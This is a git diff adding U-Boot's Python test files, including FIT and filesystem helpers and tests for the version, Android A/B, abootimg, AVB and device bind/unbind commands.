Diffstat (limited to 'test/py/tests')
147 files changed, 21190 insertions, 0 deletions
diff --git a/test/py/tests/bootstd/armbian.bmp.xz b/test/py/tests/bootstd/armbian.bmp.xz Binary files differnew file mode 100644 index 00000000000..ad137ea6e6d --- /dev/null +++ b/test/py/tests/bootstd/armbian.bmp.xz diff --git a/test/py/tests/fit_util.py b/test/py/tests/fit_util.py new file mode 100644 index 00000000000..f322b50a319 --- /dev/null +++ b/test/py/tests/fit_util.py @@ -0,0 +1,93 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC + +"""Common utility functions for FIT tests""" + +import os + +import utils + +def make_fname(ubman, basename): + """Make a temporary filename + + Args: + ubman (ConsoleBase): ubman to use + basename (str): Base name of file to create (within temporary directory) + Return: + Temporary filename + """ + + return os.path.join(ubman.config.build_dir, basename) + +def make_its(ubman, base_its, params, basename='test.its'): + """Make a sample .its file with parameters embedded + + Args: + ubman (ConsoleBase): ubman to use + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to write to (will be placed in the temp dir) + Returns: + str: Filename of .its file created + """ + its = make_fname(ubman, basename) + with open(its, 'w', encoding='utf-8') as outf: + print(base_its % params, file=outf) + return its + +def make_fit(ubman, mkimage, base_its, params, basename='test.fit', base_fdt=None): + """Make a sample .fit file ready for loading + + This creates a .its script with the selected parameters and uses mkimage to + turn this into a .fit image. + + Args: + ubman (ConsoleBase): ubman to use + mkimage (str): Filename of 'mkimage' utility + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to write to (will be placed in the temp dir) + Return: + Filename of .fit file created + """ + fit = make_fname(ubman, basename) + its = make_its(ubman, base_its, params) + utils.run_and_log(ubman, [mkimage, '-f', its, fit]) + if base_fdt: + with open(make_fname(ubman, 'u-boot.dts'), 'w') as fd: + fd.write(base_fdt) + return fit + +def make_kernel(ubman, basename, text): + """Make a sample kernel with test data + + Args: + ubman (ConsoleBase): ubman to use + basename (str): base name to write to (will be placed in the temp dir) + text (str): Contents of the kernel file (will be repeated 100 times) + Returns: + str: Full path and filename of the kernel it created + """ + fname = make_fname(ubman, basename) + data = '' + for i in range(100): + data += f'this {text} {i} is unlikely to boot\n' + with open(fname, 'w', encoding='utf-8') as outf: + print(data, file=outf) + return fname + +def make_dtb(ubman, base_fdt, basename): + """Make a sample .dts file and compile it to a .dtb + + Returns: + ubman (ConsoleBase): ubman to use + Filename of .dtb file created + """ + src = make_fname(ubman, f'{basename}.dts') + dtb = make_fname(ubman, f'{basename}.dtb') + with open(src, 'w', encoding='utf-8') as outf: + outf.write(base_fdt) + utils.run_and_log(ubman, ['dtc', src, '-O', 'dtb', '-o', dtb]) + return dtb diff --git a/test/py/tests/fs_helper.py b/test/py/tests/fs_helper.py new file mode 100644 index 00000000000..d85e2b98a24 --- /dev/null +++ b/test/py/tests/fs_helper.py @@ -0,0 +1,78 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi 
<takahiro.akashi@linaro.org> + +"""Helper functions for dealing with filesystems""" + +import re +import os +from subprocess import call, check_call, check_output, CalledProcessError + +def mk_fs(config, fs_type, size, prefix, src_dir=None, size_gran = 0x100000): + """Create a file system volume + + Args: + config (u_boot_config): U-Boot configuration + fs_type (str): File system type, e.g. 'ext4' + size (int): Size of file system in bytes + prefix (str): Prefix string of volume's file name + src_dir (str): Root directory to use, or None for none + size_gran (int): Size granularity of file system image in bytes + + Raises: + CalledProcessError: if any error occurs when creating the filesystem + """ + fs_img = f'{prefix}.{fs_type}.img' + fs_img = os.path.join(config.persistent_data_dir, fs_img) + + if fs_type == 'fat12': + mkfs_opt = '-F 12' + elif fs_type == 'fat16': + mkfs_opt = '-F 16' + elif fs_type == 'fat32': + mkfs_opt = '-F 32' + else: + mkfs_opt = '' + + if re.match('fat', fs_type): + fs_lnxtype = 'vfat' + else: + fs_lnxtype = fs_type + + if src_dir: + if fs_lnxtype == 'ext4': + mkfs_opt = mkfs_opt + ' -d ' + src_dir + elif fs_lnxtype != 'vfat': + raise ValueError(f'src_dir not implemented for fs {fs_lnxtype}') + + count = (size + size_gran - 1) // size_gran + + # Some distributions do not add /sbin to the default PATH, where mkfs lives + if '/sbin' not in os.environ["PATH"].split(os.pathsep): + os.environ["PATH"] += os.pathsep + '/sbin' + + try: + check_call(f'rm -f {fs_img}', shell=True) + check_call(f'truncate -s $(( {size_gran} * {count} )) {fs_img}', + shell=True) + check_call(f'mkfs.{fs_lnxtype} {mkfs_opt} {fs_img}', shell=True) + if fs_type == 'ext4': + sb_content = check_output(f'tune2fs -l {fs_img}', + shell=True).decode() + if 'metadata_csum' in sb_content: + check_call(f'tune2fs -O ^metadata_csum {fs_img}', shell=True) + elif fs_lnxtype == 'vfat' and src_dir: + check_call(f'mcopy -i {fs_img} -vsmpQ {src_dir}/* ::/', shell=True) + return fs_img + except CalledProcessError: + call(f'rm -f {fs_img}', shell=True) + raise + +# Just for trying out +if __name__ == "__main__": + import collections + + CNF= collections.namedtuple('config', 'persistent_data_dir') + + mk_fs(CNF('.'), 'ext4', 0x1000000, 'pref') diff --git a/test/py/tests/source.its b/test/py/tests/source.its new file mode 100644 index 00000000000..3c62f777f17 --- /dev/null +++ b/test/py/tests/source.its @@ -0,0 +1,43 @@ +/dts-v1/; + +/ { + description = "FIT image to test the source command"; + #address-cells = <1>; + + images { + default = "script-1"; + + script-1 { + data = "echo 1"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + script-2 { + data = "echo 2"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + not-a-script { + data = "echo 3"; + type = "kernel"; + arch = "sandbox"; + compression = "none"; + }; + }; + + configurations { + default = "conf-2"; + + conf-1 { + script = "script-1"; + }; + + conf-2 { + script = "script-2"; + }; + }; +}; diff --git a/test/py/tests/test_000_version.py b/test/py/tests/test_000_version.py new file mode 100644 index 00000000000..b95ceae2346 --- /dev/null +++ b/test/py/tests/test_000_version.py @@ -0,0 +1,19 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# pytest runs tests the order of their module path, which is related to the +# filename containing the test. 
This file is named such that it is sorted +# first, simply as a very basic sanity check of the functionality of the U-Boot +# command prompt. + +def test_version(ubman): + """Test that the "version" command prints the U-Boot version.""" + + # "version" prints the U-Boot sign-on message. This is usually considered + # an error, so that any unexpected reboot causes an error. Here, this + # error detection is disabled since the sign-on message is expected. + with ubman.disable_check('main_signon'): + response = ubman.run_command('version') + # Ensure "version" printed what we expected. + ubman.validate_version_string_in_text(response) diff --git a/test/py/tests/test_android/test_ab.py b/test/py/tests/test_android/test_ab.py new file mode 100644 index 00000000000..5876a137463 --- /dev/null +++ b/test/py/tests/test_android/test_ab.py @@ -0,0 +1,98 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2018 Texas Instruments, <www.ti.com> + +# Test A/B update commands. + +import os +import pytest +import utils + +class ABTestDiskImage(object): + """Disk Image used by the A/B tests.""" + + def __init__(self, ubman): + """Initialize a new ABTestDiskImage object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. + """ + + filename = 'test_ab_disk_image.bin' + + persistent = ubman.config.persistent_data_dir + '/' + filename + self.path = ubman.config.result_dir + '/' + filename + + with utils.persistent_file_helper(ubman.log, persistent): + if os.path.exists(persistent): + ubman.log.action('Disk image file ' + persistent + + ' already exists') + else: + ubman.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 524288) + os.close(fd) + cmd = ('sgdisk', persistent) + utils.run_and_log(ubman, cmd) + + cmd = ('sgdisk', '--new=1:64:512', '--change-name=1:misc', + persistent) + utils.run_and_log(ubman, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + utils.run_and_log(ubman, cmd) + + cmd = ('cp', persistent, self.path) + utils.run_and_log(ubman, cmd) + +di = None +@pytest.fixture(scope='function') +def ab_disk_image(ubman): + global di + if not di: + di = ABTestDiskImage(ubman) + return di + +def ab_dump(ubman, slot_num, crc): + output = ubman.run_command('bcb ab_dump host 0#misc') + header, slot0, slot1 = output.split('\r\r\n\r\r\n') + slots = [slot0, slot1] + slot_suffixes = ['_a', '_b'] + + header = dict(map(lambda x: map(str.strip, x.split(':')), header.split('\r\r\n'))) + assert header['Bootloader Control'] == '[misc]' + assert header['Active Slot'] == slot_suffixes[slot_num] + assert header['Magic Number'] == '0x42414342' + assert header['Version'] == '1' + assert header['Number of Slots'] == '2' + assert header['Recovery Tries Remaining'] == '0' + assert header['CRC'] == '{} (Valid)'.format(crc) + + slot = dict(map(lambda x: map(str.strip, x.split(':')), slots[slot_num].split('\r\r\n\t- ')[1:])) + assert slot['Priority'] == '15' + assert slot['Tries Remaining'] == '6' + assert slot['Successful Boot'] == '0' + assert slot['Verity Corrupted'] == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_ab') +@pytest.mark.buildconfigspec('cmd_bcb') +@pytest.mark.requiredtool('sgdisk') +def test_ab(ab_disk_image, ubman): + """Test the 'bcb ab_select' command.""" + + ubman.run_command('host bind 0 ' + ab_disk_image.path) + + output = ubman.run_command('bcb ab_select slot_name host 0#misc') + assert 're-initializing A/B metadata' in output + assert 'Attempting slot a, tries remaining 7' in output + output = 
ubman.run_command('printenv slot_name') + assert 'slot_name=a' in output + ab_dump(ubman, 0, '0xd438d1b9') + + output = ubman.run_command('bcb ab_select slot_name host 0:1') + assert 'Attempting slot b, tries remaining 7' in output + output = ubman.run_command('printenv slot_name') + assert 'slot_name=b' in output + ab_dump(ubman, 1, '0x011ec016') diff --git a/test/py/tests/test_android/test_abootimg.py b/test/py/tests/test_android/test_abootimg.py new file mode 100644 index 00000000000..2aadb692b30 --- /dev/null +++ b/test/py/tests/test_android/test_abootimg.py @@ -0,0 +1,268 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020 +# Author: Sam Protsenko <joe.skb7@gmail.com> + +# Test U-Boot's "abootimg" commands. + +import os +import pytest +import utils + +""" +These tests rely on disk image (boot.img), which is automatically created by +the test from the stored hex dump. This is done to avoid the dependency on the +most recent mkbootimg tool from AOSP/master. Here is the list of commands which +was used to generate the boot.img and obtain compressed hex dump from it: + + $ echo '/dts-v1/; / { model = "x1"; compatible = "y1,z1"; };' > test1.dts + $ echo '/dts-v1/; / { model = "x2"; compatible = "y2,z2"; };' > test2.dts + $ dtc test1.dts > dt1.dtb + $ dtc test2.dts > dt2.dtb + $ cat dt1.dtb dt2.dtb > dtb.img + $ echo 'kernel payload' > kernel + $ echo 'ramdisk payload' > ramdisk.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 2 --output boot.img + $ gzip -9 boot.img + $ xxd -p boot.img.gz > boot.img.gz.hex + +Now one can obtain original boot.img from this hex dump like this: + + $ xxd -r -p boot.img.gz.hex boot.img.gz + $ gunzip -9 boot.img.gz + +For boot image header version 4, these tests rely on two images that are generated +using the same steps above : + +1- boot.img : + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 4 --output ./boot.img + +2- vendor_boot.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --pagesize 4096 --vendor_ramdisk ./ramdisk.img \ + --header_version 4 --vendor_boot ./vboot.img \ + +""" + +# boot.img.gz hex dump +img_hex = """1f8b08084844af5d0203626f6f742e696d670073f47309f2f77451e46700 +820606010106301084501f04181819041838181898803c3346060c909c9b +92939997aa50925a5cc2300a461c3078b2e1793c4b876fd92db97939fb6c +b7762ffff07d345446c1281805e8a0868d81e117a45e111c0d8dc101b253 +8bf25273140a122b73f21353b8460364148c8251300a46c1281801a02831 +3725b3387bb401300a46c1281805a360148c207081f7df5b20550bc41640 +9c03c41a0c90f17fe85400986d82452b6c3680198a192a0ce17c3610ae34 +d4a9820881a70f3873f35352731892f3730b124b32937252a96bb9119ae5 +463a5546f82c1f05a360148c8251300a462e000085bf67f200200000""" + +# boot img v4 hex dump +boot_img_hex = """1f8b080827b0cd630203626f6f742e696d6700edd8bd0d82601885d1d7c4 +58d8c808b88195bd098d8d246e40e42b083f1aa0717be99d003d277916b8 +e5bddc8a7b792d8e8788c896ce9b88d32ebe6c971e7ddd3543cae734cd01 +c0ffc84c0000b0766d1a87d4e5afeadd3dab7a6f10000000f84163d5d7cd +d43a000000000000000060c53e7544995700400000""" + +# vendor boot image v4 hex dump +vboot_img_hex = """1f8b0808baaecd63020376626f6f742e696d6700edd8310b824018c6f1b3 +222a08f41b3436b4280dcdd19c11d16ee9109d18d59042d047ec8b04cd0d 
+d19d5a4345534bf6ffc173ef29272f38e93b1d0ec67dd79d548462aa1cd2 +d5d20b0000f8438678f90c18d584b8a4bbb3a557991ecb2a0000f80d6b2f +f4179b656be5c532f2fc066f040000000080e23936af2755f62a3d918df1 +db2a7ab67f9ffdeb7df7cda3465ecb79c4ce7e5c577562bb9364b74449a5 +1e467e20c53c0a57de763193c1779b3b4fcd9d4ee27c6a0e00000000c0ff +309ffea7010000000040f1dc004129855400400000""" + +# Expected response for "abootimg dtb_dump" command +dtb_dump_resp="""## DTB area contents (concat format): + - DTB #0: + (DTB)size = 125 + (DTB)model = x1 + (DTB)compatible = y1,z1 + - DTB #1: + (DTB)size = 125 + (DTB)model = x2 + (DTB)compatible = y2,z2""" +# Address in RAM where to load the boot image ('abootimg' looks in $loadaddr) +loadaddr = 0x1000 +# Address in RAM where to load the vendor boot image ('abootimg' looks in $vloadaddr) +vloadaddr= 0x10000 +# Expected DTB #1 offset from the boot image start address +dtb1_offset = 0x187d +# Expected DTB offset from the vendor boot image start address +dtb2_offset = 0x207d +# DTB #1 start address in RAM +dtb1_addr = loadaddr + dtb1_offset +# DTB #2 start address in RAM +dtb2_addr = vloadaddr + dtb2_offset + +class AbootimgTestDiskImage(object): + """Disk image used by abootimg tests.""" + + def __init__(self, ubman, image_name, hex_img): + """Initialize a new AbootimgDiskImage object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. + """ + + gz_hex = ubman.config.persistent_data_dir + '/' + image_name + '.gz.hex' + gz = ubman.config.persistent_data_dir + '/' + image_name + '.gz' + + filename = image_name + persistent = ubman.config.persistent_data_dir + '/' + filename + self.path = ubman.config.result_dir + '/' + filename + ubman.log.action('persistent is ' + persistent) + with utils.persistent_file_helper(ubman.log, persistent): + if os.path.exists(persistent): + ubman.log.action('Disk image file ' + persistent + + ' already exists') + else: + ubman.log.action('Generating ' + persistent) + + f = open(gz_hex, "w") + f.write(hex_img) + f.close() + cmd = ('xxd', '-r', '-p', gz_hex, gz) + utils.run_and_log(ubman, cmd) + cmd = ('gunzip', '-9', gz) + utils.run_and_log(ubman, cmd) + + cmd = ('cp', persistent, self.path) + utils.run_and_log(ubman, cmd) + +gtdi1 = None +@pytest.fixture(scope='function') +def abootimg_disk_image(ubman): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi1 + if not gtdi1: + gtdi1 = AbootimgTestDiskImage(ubman, 'boot.img', img_hex) + return gtdi1 + +gtdi2 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_vboot(ubman): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi2 + if not gtdi2: + gtdi2 = AbootimgTestDiskImage(ubman, 'vendor_boot.img', vboot_img_hex) + return gtdi2 + +gtdi3 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_boot(ubman): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. 
However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi3 + if not gtdi3: + gtdi3 = AbootimgTestDiskImage(ubman, 'bootv4.img', boot_img_hex) + return gtdi3 + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimg(abootimg_disk_image, ubman): + """Test the 'abootimg' command.""" + + ubman.log.action('Loading disk image to RAM...') + ubman.run_command('setenv loadaddr 0x%x' % (loadaddr)) + ubman.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimg_disk_image.path)) + + ubman.log.action('Testing \'abootimg get ver\'...') + response = ubman.run_command('abootimg get ver') + assert response == "2" + ubman.run_command('abootimg get ver v') + response = ubman.run_command('env print v') + assert response == 'v=2' + + ubman.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = ubman.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: recovery_dtbo_size is 0' + + ubman.log.action('Testing \'abootimg dump dtb\'...') + response = ubman.run_command('abootimg dump dtb').replace('\r', '') + assert response == dtb_dump_resp + + ubman.log.action('Testing \'abootimg get dtb_load_addr\'...') + ubman.run_command('abootimg get dtb_load_addr a') + response = ubman.run_command('env print a') + assert response == 'a=11f00000' + + ubman.log.action('Testing \'abootimg get dtb --index\'...') + ubman.run_command('abootimg get dtb --index=1 dtb1_start') + response = ubman.run_command('env print dtb1_start') + correct_str = "dtb1_start=%x" % (dtb1_addr) + assert response == correct_str + ubman.run_command('fdt addr $dtb1_start') + ubman.run_command('fdt get value v / model') + response = ubman.run_command('env print v') + assert response == 'v=x2' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimgv4(abootimgv4_disk_image_vboot, abootimgv4_disk_image_boot, ubman): + """Test the 'abootimg' command with boot image header v4.""" + + ubman.log.action('Loading disk image to RAM...') + ubman.run_command('setenv loadaddr 0x%x' % (loadaddr)) + ubman.run_command('setenv vloadaddr 0x%x' % (vloadaddr)) + ubman.run_command('host load hostfs - 0x%x %s' % (vloadaddr, + abootimgv4_disk_image_vboot.path)) + ubman.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimgv4_disk_image_boot.path)) + ubman.run_command('abootimg addr 0x%x 0x%x' % (loadaddr, vloadaddr)) + ubman.log.action('Testing \'abootimg get ver\'...') + response = ubman.run_command('abootimg get ver') + assert response == "4" + ubman.run_command('abootimg get ver v') + response = ubman.run_command('env print v') + assert response == 'v=4' + + ubman.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = ubman.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: header version must be >= 1 and <= 2 to get dtbo' + + ubman.log.action('Testing \'abootimg get dtb_load_addr\'...') + ubman.run_command('abootimg get dtb_load_addr a') + response = ubman.run_command('env print a') + assert response == 'a=11f00000' + + ubman.log.action('Testing \'abootimg get dtb --index\'...') + 
ubman.run_command('abootimg get dtb --index=1 dtb2_start') + response = ubman.run_command('env print dtb2_start') + correct_str = "dtb2_start=%x" % (dtb2_addr) + assert response == correct_str + + ubman.run_command('fdt addr $dtb2_start') + ubman.run_command('fdt get value v / model') + response = ubman.run_command('env print v') + assert response == 'v=x2' diff --git a/test/py/tests/test_android/test_avb.py b/test/py/tests/test_android/test_avb.py new file mode 100644 index 00000000000..137d83e1dea --- /dev/null +++ b/test/py/tests/test_android/test_avb.py @@ -0,0 +1,137 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# +# Android Verified Boot 2.0 Test + +""" +This tests Android Verified Boot 2.0 support in U-Boot: + +For additional details about how to build proper vbmeta partition +check doc/android/avb2.rst + +For configuration verification: +- Corrupt boot partition and check for failure +- Corrupt vbmeta partition and check for failure +""" + +import pytest + +# defauld mmc id +mmc_dev = 1 +temp_addr = 0x90000000 +temp_addr2 = 0x90002000 + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +def test_avb_verify(ubman): + """Run AVB 2.0 boot verification chain with avb subset of commands + """ + + success_str = "Verification passed successfully" + + response = ubman.run_command('avb init %s' %str(mmc_dev)) + assert response == '' + response = ubman.run_command('avb verify') + assert response.find(success_str) + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_uuid(ubman): + """Check if 'avb get_uuid' works, compare results with + 'part list mmc 1' output + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('mmc rescan; mmc dev %s' % + str(mmc_dev)) + assert response.find('is current device') + + part_lines = ubman.run_command('mmc part').splitlines() + part_list = {} + cur_partname = '' + + for line in part_lines: + if '"' in line: + start_pt = line.find('"') + end_pt = line.find('"', start_pt + 1) + cur_partname = line[start_pt + 1: end_pt] + + if 'guid:' in line: + guid_to_check = line.split('guid:\t') + part_list[cur_partname] = guid_to_check[1] + + # lets check all guids with avb get_guid + for part, guid in part_list.items(): + avb_guid_resp = ubman.run_command('avb get_uuid %s' % part) + assert guid == avb_guid_resp.split('UUID: ')[1] + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_read_rb(ubman): + """Test reading rollback indexes + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb read_rb 1') + assert response == 'Rollback index: 0' + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_is_unlocked(ubman): + """Test if device is in the unlocked state + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb is_unlocked') + assert response == 'Unlocked = 1' + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_read(ubman): + """Test mmc read operation + """ + + response = ubman.run_command('mmc rescan; mmc dev %s 0' % + str(mmc_dev)) + assert response.find('is current device') + + response = ubman.run_command('mmc read 0x%x 0x100 0x1' % temp_addr) + assert response.find('read: OK') + + response 
= ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb read_part xloader 0 100 0x%x' % + temp_addr2) + assert response.find('Read 512 bytes') + + # Now lets compare two buffers + response = ubman.run_command('cmp 0x%x 0x%x 40' % + (temp_addr, temp_addr2)) + assert response.find('64 word') + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('optee_ta_avb') +def test_avb_persistent_values(ubman): + """Test reading/writing persistent storage to avb + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb write_pvalue test value_value') + assert response == 'Wrote 12 bytes' + + response = ubman.run_command('avb read_pvalue test 12') + assert response == 'Read 12 bytes, value = value_value' diff --git a/test/py/tests/test_bind.py b/test/py/tests/test_bind.py new file mode 100644 index 00000000000..16c63ae9684 --- /dev/null +++ b/test/py/tests/test_bind.py @@ -0,0 +1,193 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +""" Test for bind command """ + +import re +import pytest + +def in_tree(response, name, uclass, drv, depth, last_child): + lines = [x.strip() for x in response.splitlines()] + leaf = '' + if depth != 0: + leaf = ' ' + ' ' * (depth - 1) + if not last_child: + leaf = leaf + r'\|' + else: + leaf = leaf + '`' + + leaf = leaf + '-- ' + name + line = (r' *{:10.10} *[0-9]* \[ [ +] \] {:20.20} [` |]{}$' + .format(uclass, drv, leaf)) + prog = re.compile(line) + for l in lines: + if prog.match(l): + return True + return False + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +def test_bind_unbind_with_node(ubman): + + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind usb_ether driver (which has no compatible) to usb@1 node. + ##New entry usb_ether should appear in the dm tree + response = ubman.run_command('bind /usb@1 usb_ether') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'usb@1', 'ethernet', 'usb_ether', 1, True) + + #Unbind child #1. No error expected and all devices should be there except for bind-test-child1 + response = ubman.run_command('unbind /bind-test/bind-test-child1') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert 'bind-test-child1' not in tree + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind child #1. No error expected and all devices should be there + response = ubman.run_command('bind /bind-test/bind-test-child1 phy_sandbox') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, False) + + #Unbind child #2. 
No error expected and all devices should be there except for bind-test-child2 + response = ubman.run_command('unbind /bind-test/bind-test-child2') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert 'bind-test-child2' not in tree + + + #Bind child #2. No error expected and all devices should be there + response = ubman.run_command('bind /bind-test/bind-test-child2 simple_bus') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #Unbind parent. No error expected. All devices should be removed and unbound + response = ubman.run_command('unbind /bind-test') + assert response == '' + tree = ubman.run_command('dm tree') + assert 'bind-test' not in tree + assert 'bind-test-child1' not in tree + assert 'bind-test-child2' not in tree + + #try binding invalid node with valid driver + response = ubman.run_command('bind /not-a-valid-node simple_bus') + assert response != '' + tree = ubman.run_command('dm tree') + assert 'not-a-valid-node' not in tree + + #try binding valid node with invalid driver + response = ubman.run_command('bind /bind-test not_a_driver') + assert response != '' + tree = ubman.run_command('dm tree') + assert 'bind-test' not in tree + + #bind /bind-test. Device should come up as well as its children + response = ubman.run_command('bind /bind-test simple_bus') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + response = ubman.run_command('unbind /bind-test') + assert response == '' + +def get_next_line(tree, name): + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + child_line = '' + for idx, line in enumerate(treelines): + if '-- ' + name in line: + try: + child_line = treelines[idx+1] + except: + pass + break + return child_line + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +@pytest.mark.singlethread +def test_bind_unbind_with_uclass(ubman): + #bind /bind-test + response = ubman.run_command('bind /bind-test simple_bus') + assert response == '' + + #make sure bind-test-child2 is there and get its uclass/index pair + tree = ubman.run_command('dm tree') + child2_line = [x.strip() for x in tree.splitlines() if '-- bind-test-child2' in x] + assert len(child2_line) == 1 + + child2_uclass = child2_line[0].split()[0] + child2_index = int(child2_line[0].split()[1]) + + #bind simple_bus as a child of bind-test-child2 + response = ubman.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = ubman.run_command('dm tree') + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = ubman.run_command('unbind simple_bus 
{}'.format(child_of_child2_index)) + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + assert not in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line == '' + + #bind simple_bus as a child of bind-test-child2 + response = ubman.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = ubman.run_command('dm tree') + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = ubman.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + assert response == '' + + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + 